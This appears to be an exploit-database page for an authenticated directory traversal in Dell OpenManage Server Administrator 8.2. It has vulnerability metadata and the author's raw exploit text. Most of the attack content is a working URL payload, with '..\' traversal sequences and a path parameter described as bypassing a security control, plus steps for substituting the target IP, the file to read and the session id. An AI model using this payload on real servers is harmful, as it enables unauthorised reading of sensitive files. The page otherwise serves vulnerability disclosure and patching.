header-logo
Suggest Exploit
vendor:
OpenManage Server Administrator
by:
hantwister
7.5
CVSS
HIGH
Authenticated Directory Traversal
22
CWE
Product Name: OpenManage Server Administrator
Affected Version From: 8.2
Affected Version To: 8.2
Patch Exists: YES
Related CWE:
CPE: a:dell:openmanage_server_administrator:8.2
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 x64
2016

Dell OpenManage Server Administrator 8.2 Authenticated Directory Traversal

When authenticated as an admin, an attacker can manipulate the URL to access arbitrary files on the server. By substituting the target IP, desired file path, and session-specific vid parameter, the attacker can bypass security controls and view sensitive files.

Mitigation:

Apply the latest patches and updates from the vendor.
Source

Exploit-DB raw data:

# Exploit Title: Dell OpenManage Server Administrator 8.2 Authenticated
Directory Traversal
# Date: February 22, 2016
# Exploit Author: hantwister
# Vendor Homepage: http://www.dell.com/
# Software Link:
http://www.dell.com/support/contents/us/en/19/article/Product-Support/Self-support-Knowledgebase/enterprise-resource-center/Enterprise-Tools/OMSA
# Version: 8.2
# Tested on: Windows 7 x64

When authenticated as an admin, make the following adjustments to the URL
below:

1) Substitute "<IP>" for the target;
2) Substitute "Windows\WindowsUpdate.log" for the desired file;
3) Substitute the value of the vid parameter and the folder name preceding
"/ViewFile" with the vid parameter from your current session.

https://
<IP>:1311/0123456789ABCDEF/ViewFile?path=\temp&file=hello\..\..\..\..\..\..\..\..\Windows\WindowsUpdate.log&vid=0123456789ABCDEF

In the file parameter, "hello" can be changed to any other name; the folder
need not exist. However, the file parameter must not start with a common
file path separator, nor a dot character.

The path parameter should not be changed; the provided value is essential
to bypassing a security control.